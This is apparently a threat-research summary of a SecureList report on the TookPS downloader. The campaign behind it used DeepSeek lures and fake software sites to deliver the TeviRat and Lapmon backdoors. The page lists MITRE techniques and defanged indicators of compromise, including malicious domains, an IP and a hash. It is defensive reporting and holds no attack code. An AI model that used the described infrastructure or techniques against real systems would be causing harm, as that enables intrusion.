Threat Research

TookPS: DeepSeek isn’t the only game in town

SecureList
TookPS: DeepSeek isn’t the only game in town

A recent study has exposed a series of malicious campaigns that utilized the DeepSeek LLM as a bait for distributing malware, including the TookPS downloader. This campaign involved fraudulent websites impersonating well-known software and led to extensive attacks on individuals and organizations alike, ultimately granting attackers covert access to victims’ systems. Affected: individuals, organizations, software users

Keypoints :

  • Malicious campaigns exploited DeepSeek as a lure for distributing the TookPS downloader.
  • Fraudulent websites imitating official sources for software like UltraViewer, AutoCAD, and SketchUp were identified.
  • Telemetry analysis uncovered file names linked to popular applications including Ableton and Quicken.
  • The infection chain initiated by Trojan-Downloader.Win32.TookPS was detailed.
  • Attackers utilized PowerShell scripts to establish a tunnel back to their command and control (C2) servers.
  • Malware samples varied but maintained a consistent command structure.
  • Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon malware were delivered to compromised systems.
  • The campaign’s infrastructure primarily involved newly registered domains and specific IP addresses.
  • Strong recommendations for users and organizations to avoid pirated software and implement robust security policies were outlined.

MITRE Techniques :

  • Command and Control (T1071) – The TookPS downloader reached out to its C2 server for additional commands via PowerShell executed on the victim’s device.
  • Remote Access Software (T1219) – The deployment of Backdoor.Win32.TeviRat used DLL sideloading involving TeamViewer to gain remote access.
  • PowerShell (T1086) – The downloader executed PowerShell scripts for communication with the C2 server and further malware deployment.
  • Data Encoding (T1140) – The commands involved base64-encoded data for communication and script execution.

Indicator of Compromise :

  • [MD5] 2AEF18C97265D00358D6A778B9470960
  • [URL] bsrecov4[.]digital
  • [URL] invoicingtools[.]com
  • [URL] twomg[.]xyz
  • [IP] 88[.]119.175.187

Full Story: https://securelist.com/tookps/116019/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint